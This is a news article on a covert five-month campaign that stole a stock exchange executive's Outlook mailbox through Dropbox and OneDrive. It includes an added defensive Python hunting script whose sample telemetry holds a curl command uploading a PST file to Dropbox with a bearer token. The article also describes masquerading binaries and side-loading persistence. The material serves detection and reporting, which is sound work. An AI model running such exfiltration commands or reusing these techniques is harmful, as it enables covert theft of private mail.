Attackers Stole Global Stock Exchange Executive’s Mailbox for Five Months in Covert Campaign

Written by: Lore Apostol, Cybersecurity Writer
Key Takeaways
  • Five-Month Campaign: Attackers targeted a major global stock exchange senior executive's Outlook mailbox over a five-month period.
  • Cloud-Based Exfiltration: Data was stolen in incremental batches through Dropbox and OneDrive Personal to blend in with legitimate traffic.
  • Unattributed Espionage: Analysis says the activity cannot be linked to a known threat group, but commands used point to espionage as the motivation.

A five-month espionage campaign targeted the email account of a senior figure at a major global stock exchange, researchers say. The attackers focused exclusively on stealing the executive's Outlook mailbox, extracting and exfiltrating data in incremental batches to make the traffic indistinguishable from legitimate cloud activity.

The report asserted that the cyberespionage campaign represented long-term theft of a single Outlook mailbox via Dropbox and OneDrive Personal.

Initial Compromise, Incremental Mailbox Theft via Aspose

The first observed malicious activity occurred on October 10, 2025, when two masquerading binaries (armsvc.exe and oneservice.exe) were already installed and running as SYSTEM, according to Broadcom Symantec and Carbon Black's Threat Hunter Team.

Both binaries impersonated legitimate services, with armsvc.exe mimicking the legitimate Adobe Acrobat Reader Update service and oneservice.exe spoofing the OneDrive setup helper. Persistence was maintained through scheduled tasks masquerading as Adobe and Lenovo services. 

Attack chain | Source: Symantec and Carbon Black by Broadcom

On November 12, 2025, the attackers completed the OAuth handshake to obtain a Dropbox API token, then uploaded data to the Dropbox content endpoint via curl. An Aspose-based mailbox stealer repeatedly extracted the target's Outlook OST into PST files through February 17, 2026. 

From November 21 onward, the attackers added OneDrive Personal as a second channel, using hard-coded Microsoft IP addresses to avoid DNS queries for onedrive.live.com. A brief third channel via temp.sh was used on November 20-21 and then abandoned.
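As an added defensive example (not code from the Symantec and Carbon Black report), the Python below hunts constructed endpoint telemetry for the three behaviours described above: lookalike service binaries launched from outside their expected install directory, curl pushing data to the Dropbox content endpoint, and outbound connections to addresses that no DNS answer on the host produced. The expected directory for armsvc.exe, the event field names and the sample events are all assumptions.

```python
import ntpath  # handles Windows paths regardless of the analyst's host OS

# Expected install directories for the impersonated names (assumption; adjust per estate).
# An empty set means no legitimate binary of that name is expected at all.
EXPECTED_DIRS = {
    "armsvc.exe": {r"c:\program files (x86)\common files\adobe\arm\1.0"},
    "oneservice.exe": set(),
    "onedrivesync.exe": set(),
}
# Strings that identify a direct upload to the Dropbox content endpoint.
DROPBOX_UPLOAD_MARKERS = ("content.dropboxapi.com", "/2/files/upload")

# Constructed telemetry (not from the report): process starts, DNS answers, outbound connections.
EVENTS = [
    {"type": "process", "image": r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe",
     "user": "SYSTEM", "cmdline": "armsvc.exe"},
    {"type": "process", "image": r"C:\ProgramData\Intel\armsvc.exe", "user": "SYSTEM", "cmdline": "armsvc.exe"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe", "user": "SYSTEM",
     "cmdline": 'curl.exe -X POST https://content.dropboxapi.com/2/files/upload '
                '-H "Authorization: Bearer <token>" --data-binary @batch03.pst'},
    {"type": "dns", "query": "login.microsoftonline.com", "answer": "203.0.113.10"},
    {"type": "netconn", "image": r"C:\ProgramData\Intel\oneservice.exe", "dest_ip": "203.0.113.10"},
    {"type": "netconn", "image": r"C:\ProgramData\Intel\oneservice.exe", "dest_ip": "198.51.100.25"},
]


def hunt(events):
    """Return (rule, detail) findings for the behaviours the report describes."""
    resolved = {e["answer"] for e in events if e["type"] == "dns"}
    findings = []
    for e in events:
        if e["type"] == "process":
            name = ntpath.basename(e["image"]).lower()
            folder = ntpath.dirname(e["image"]).lower()
            # Rule A: a lookalike service name running from somewhere other than its expected directory.
            if name in EXPECTED_DIRS and folder not in EXPECTED_DIRS[name]:
                findings.append(("masquerading_service_binary", f'{e["image"]} ({e["user"]})'))
            # Rule B: curl sending data straight to the Dropbox content endpoint.
            if name == "curl.exe" and any(m in e["cmdline"] for m in DROPBOX_UPLOAD_MARKERS):
                findings.append(("curl_dropbox_upload", e["image"]))
        elif e["type"] == "netconn" and e["dest_ip"] not in resolved:
            # Rule C: connection to an IP no DNS lookup produced, i.e. a hard-coded address.
            findings.append(("connection_without_dns", f'{e["image"]} -> {e["dest_ip"]}'))
    return findings


if __name__ == "__main__":
    for rule, detail in hunt(EVENTS):
        print(f"{rule}: {detail}")
```

Rule C fires on any IP-literal connection, so in production it should be scoped to processes that normally resolve names, or joined with a longer DNS window than a single host's cache.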

Persistence Rebuilds and Final Activity

On February 27, 2026, a new persistence anchor was added via onedrivesync.exe, masquerading as the OneDrive sync service. Lastly, on March 19, the attackers placed in an Intel-themed staging directory a DLL whose name was chosen so it could plausibly be side-loaded by Microsoft Test Engine.

The use of public tools and cloud infrastructure prevented attribution to any known attack group.

Last month, Cloud Atlas APT targeted Russian and Belarusian government and diplomatic entities with the PowerCloud tool, and suspected Belarusian state-nexus actors targeted Ukraine with a new Cobalt Strike cyberespionage campaign.
